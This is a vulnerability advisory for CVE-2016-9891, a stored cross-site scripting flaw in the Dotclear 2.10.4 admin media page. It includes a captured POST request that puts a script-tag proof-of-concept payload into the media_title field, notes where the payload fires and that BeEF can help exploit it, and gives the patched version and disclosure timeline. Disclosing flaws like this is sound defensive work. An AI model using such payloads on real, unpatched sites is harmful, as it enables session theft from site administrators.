[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4
Tested Version: 2.10.4, released 02.11.2016
Vulnerability Type: Cross-Site Scripting (CWE-79)
Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)
There is a XSS vulnerability in the /dotcl/admin/media_item.php page.
When an authenticated user of Dotclear renames the file title, the following POST request is sent to the server:
POST /dotcl/admin/media_item.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0 Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 201 media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae
The parameter media_title is vulnerable to XSS.
The payload is executed when an authenticated user navigates to the /dotcl/admin/media.php page.
When embedding an image or adding an attachment under Entries, the media.php page will be called and the payload will trigger as well.
An attacker is able to inject malicious scripts into otherwise benign and trusted web sites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of a HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).
Update to the latest version, which is 2.11.1 (fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11
Vulnerability found: 26.11.2016
Vendor informed: 05.12.2016
Response by vendor: 05.12.2016
Fix by vendor: 05.12.2016
Patched version released: 28.12.2016
Public Advisory: 29.12.2016